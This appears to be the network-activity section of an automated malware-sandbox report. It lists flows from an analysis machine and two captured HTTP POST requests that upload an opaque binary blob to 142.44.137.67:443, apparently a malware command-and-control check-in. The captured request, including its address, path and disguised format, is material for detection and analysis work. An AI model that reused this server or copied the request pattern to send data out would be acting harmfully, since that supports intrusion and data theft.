Hosts
No hosts contacted.
TCP
| Source |
Source Port |
Destination |
Destination Port |
| 192.168.56.101 |
49182 |
142.44.137.67 |
443 |
UDP
| Source |
Source Port |
Destination |
Destination Port |
| 192.168.56.101 |
50002 |
114.114.114.114 |
53 |
| 192.168.56.101 |
51378 |
114.114.114.114 |
53 |
| 192.168.56.101 |
57756 |
114.114.114.114 |
53 |
| 192.168.56.101 |
58367 |
114.114.114.114 |
53 |
| 192.168.56.101 |
62318 |
114.114.114.114 |
53 |
| 192.168.56.101 |
137 |
192.168.56.255 |
137 |
| 192.168.56.101 |
138 |
192.168.56.255 |
138 |
| 192.168.56.101 |
123 |
20.189.79.72 time.windows.com |
123 |
| 192.168.56.101 |
49235 |
224.0.0.252 |
5355 |
| 192.168.56.101 |
50534 |
224.0.0.252 |
5355 |
| 192.168.56.101 |
51963 |
224.0.0.252 |
5355 |
| 192.168.56.101 |
53237 |
224.0.0.252 |
5355 |
| 192.168.56.101 |
53657 |
224.0.0.252 |
5355 |
| 192.168.56.101 |
56804 |
224.0.0.252 |
5355 |
| 192.168.56.101 |
60384 |
224.0.0.252 |
5355 |
| 192.168.56.101 |
62191 |
224.0.0.252 |
5355 |
| 192.168.56.101 |
63429 |
224.0.0.252 |
5355 |
| 192.168.56.101 |
1900 |
239.255.255.250 |
1900 |
| 192.168.56.101 |
50003 |
239.255.255.250 |
3702 |
| 192.168.56.101 |
58368 |
239.255.255.250 |
3702 |
HTTP & HTTPS Requests
| URI |
Data |
| http://142.44.137.67:443/mWMQFtFQ8p9gfpN/MHogdizdd7sLpAb/ |
POST /mWMQFtFQ8p9gfpN/MHogdizdd7sLpAb/ HTTP/1.1
Content-Type: multipart/form-data; boundary=-------------------KVmOXVzrClKj75ko1Hp
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 142.44.137.67:443
Content-Length: 4500
Connection: Keep-Alive
Cache-Control: no-cache
|
| http://142.44.137.67:443/mWMQFtFQ8p9gfpN/MHogdizdd7sLpAb/ |
POST /mWMQFtFQ8p9gfpN/MHogdizdd7sLpAb/ HTTP/1.1
Content-Type: multipart/form-data; boundary=-------------------KVmOXVzrClKj75ko1Hp
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 142.44.137.67:443
Content-Length: 4500
Connection: Keep-Alive
Cache-Control: no-cache
---------------------KVmOXVzrClKj75ko1Hp
Content-Disposition: form-data; name="tlxhwdvzvvjvheibo"; filename="rgwnvllvzocjsrtx"
Content-Type: application/octet-stream
|\xe1I\xa2\xf3\xac\xbb\xe2\xe0\x10\xe2\xfch\xbd\xf1\xd3\x15p\x93\xe1l\xcf\x05\xf7\xaf\xdc\x1bR\xbd\xf3\xa4\xe1\x1fN\xd2\xd9[\x1b\xbcZ;VB\xf8\x89\x97\x97\xf0\x18\x11\xfa\x91\xc9\x130\xc0S\xe9\xe6fP\x9bR\x950\xbf\xf7\x8c\xd8\xdd)\xdfa\xe5\x85<\xa2\x16\x1b\x0fy\xa5v\x80\x1ax@\x0c\xdd\x8c\x10\x8f\xc2\xac\xe9+J\x81n?\xff\xd40\xb2\x7f\x87.\xd8\x19/uI\xc6\xe2f~i\xf4\xa7\xbe\xda1\xda\x06\xc9\xe4\xf87f\xc7\x91l\xee\x8dd\xf7}.\x8ec\xae?\xa3\x9e\xf1\x9b\x94\x88\xea\x10\xf5\xd5\x8as3\x9a\x9b\x027\xc4\xecc\xb8\xa0\xae\x9f\x1f\xf9\xfc$\x9b\xc1\x0f\xe2\xa7D\x19\xb1\xca{\x7f\xceZX\x83\x19\x0e(ka>\x94ROw\x93\x03 \xa0\xde\xff\xb4]\xf0\xad\x054\xa7\xd6\x92 v!\x05\xfb\xbf\x81\xf7\xed\x8bUDZ\xd55\x89\xf8a\x84\xec9Xb8\xd6bO\x16Jj\xba\xe8\x88\xe8\x1e\xa5\xf4\xb6M\xab\x04
$\xae\x9e\x8aS/pMQOH\x971\xaasV\xb5\xde\x01\xba\x16\xc2\x97\xf0\x13\xb9\xb4\xd2~\x9b\xc1\xf2&-]cl7\xd6Ra>\x99\x19"[q\x8f>XP\xbd\xd8t3\xd1EM\xb9U\x92b6\xf4\xb6\xa9\xd1\x07yK5\x86\x0b\xab\xe8l\xa3H\xcbT\xe1!\xa0=@Y\xd7\x0f\x18\xc7}\x97w H\x86\xda\xc2Mc\xde\x00\xd73\x11\xbb\xa0\x12\xac\xf8\x17\xb2\xb0\xc8N\x14JZ\xa1OB\xa0\xea[\xd5\xfc$\xfd\xe5\xc0\x1c\x887\xd4Y\x84d3\xda\x9a\x80\xb5\x87\x85\xc8\xd2\xbaEEf\x96y
---------------------KVmOXVzrClKj75ko1Hp--\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts